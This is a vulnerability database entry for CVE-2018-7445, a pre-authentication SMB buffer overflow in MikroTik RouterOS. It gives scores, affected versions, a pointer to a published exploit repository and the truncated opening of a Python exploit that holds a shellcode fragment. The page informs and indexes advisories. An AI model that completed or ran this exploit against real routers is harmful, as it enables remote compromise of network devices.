
CVE-2018-7445

Published: 19/03/2018 Updated: 24/04/2018
CVSS v2 Base Score: 10 | Impact Score: 10 | Exploitability Score: 10
CVSS v3 Base Score: 9.8 | Impact Score: 5.9 | Exploitability Score: 3.9
VMScore: 1000
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

A buffer overflow was found in the MikroTik RouterOS SMB service when processing NetBIOS session request messages. A remote attacker who can reach the service can exploit this vulnerability to gain code execution on the system. The overflow occurs before authentication takes place, so an unauthenticated remote attacker can trigger it. All architectures and all devices running RouterOS prior to 6.41.3/6.42rc27 are vulnerable.

Vulnerable Products

mikrotik routeros

mikrotik routeros 6.4.2

Exploits

#!/usr/bin/env python
import socket
import struct
import sys
import telnetlib

NETBIOS_SESSION_MESSAGE = "\x00"
NETBIOS_SESSION_REQUEST = "\x81"
NETBIOS_SESSION_FLAGS = "\x00"

# trick from shell-storm.org/shellcode/files/shellcode-881.php
# will place the socket file descriptor in eax
find_sock_fd = "\x6a\x02\x5b\x6a\x29\x58\xcd\x80\x48"
...

Github Repositories

Mikrotik SMB buffer overflow exploit

Chimay-Blue: MikroTik RouterOS SMB Buffer Overflow (CVE-2018-7445). Advisory: www.coresecurity.com/advisories/mikrotik-routeros-smb-buffer-overflow. License: creativecommons.org/licenses/by-nc-sa/3.0/us/. Vulnerable versions: until RouterOS 6.41.2. What's new in 6.41.3 (2018-Mar-08 11:55): *) smb - improved NetBIOS name handling and stability; []
